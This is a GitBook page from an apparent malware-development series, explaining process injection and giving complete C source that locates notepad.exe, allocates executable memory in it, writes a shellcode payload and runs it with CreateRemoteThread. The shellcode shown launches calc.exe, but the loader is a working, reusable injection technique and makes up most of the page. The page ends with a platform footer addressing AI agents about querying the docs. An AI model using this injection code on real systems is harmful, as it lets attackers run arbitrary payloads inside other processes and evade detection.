> For the complete documentation index, see [llms.txt](https://everythingblackkk.gitbook.io/everythingblackkk/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://everythingblackkk.gitbook.io/everythingblackkk/malware-development/editor.md).

# Process Injection --Part 1--

This C program performs **process injection**, specifically **remote code injection** into a running instance of <mark style="color:orange;">`notepad.exe`</mark>. Here's a step-by-step breakdown of what the code does:

## **1 - FindTarget Function (Finds Process ID)**

* The `FindTarget` function takes a process name (`ProcName`) as an argument and searches for a running process with that name.
* It uses <mark style="color:purple;">`CreateToolhelp32Snapshot`</mark> to take a snapshot of all running processes.
* It iterates through the process list using <mark style="color:purple;">`Process32Next`</mark>, checking if the process name matches `ProcName` (`notepad.exe` in this case).
* If found, it returns the **process ID (PID)** of the target process

## &#x20;**2 - Injection into Notepad**

1. **Open Notepad Process**
   * The <mark style="color:purple;">`OpenProcess`</mark> function is used to get a handle to the `notepad.exe` process with **full access (`PROCESS_ALL_ACCESS`)**
2. **Allocate Memory in Notepad**
   * <mark style="color:purple;">`VirtualAllocEx`</mark> reserves memory inside `notepad.exe` with `PAGE_EXECUTE_READWRITE` permissions, allowing the shellcode to be written and executed.
3. **Write the Shellcode into Notepad**
   * <mark style="color:purple;">`WriteProcessMemory`</mark> writes the shellcode (`payload[]`) into the allocated memory space.
4. **Execute the Shellcode in Notepad**
   * <mark style="color:purple;">`CreateRemoteThread`</mark> starts a new thread inside `notepad.exe` at the memory location where the shellcode was written, effectively executing it.

```csharp

#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>


int FindTarget(const char *ProcName) {
	HANDLE hSnapShot;
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(PROCESSENTRY32);
	int pid = 0;

	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, pid);

	if (INVALID_HANDLE_VALUE == hSnapShot) {
		printf("[!] There is a problem in hSnapShot\n");
		return -1;
	}

	if (!Process32First(hSnapShot, &pe32)) {
		printf("[!] There is a problem in Process32First \n");
		CloseHandle(hSnapShot);
		return -1;
	}

	while (Process32Next(hSnapShot, &pe32)){
		if (lstrcmpiA(ProcName, pe32.szExeFile) == 0) {
			pid = pe32.th32ProcessID;
			break;
		}
	}

	CloseHandle(hSnapShot);
	return pid;

}

int main() {

unsigned char payload[] = {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00
};

	
	HANDLE hProcess; 
	HANDLE hThread ;
	void* exec_mem;
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, FindTarget("notepad.exe"));
	exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(payload) , MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(hProcess, exec_mem, payload, sizeof(payload), NULL);
	hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL , 0 , 0);
	CloseHandle(hProcess);
	return 0;

}



```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://everythingblackkk.gitbook.io/everythingblackkk/malware-development/editor.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.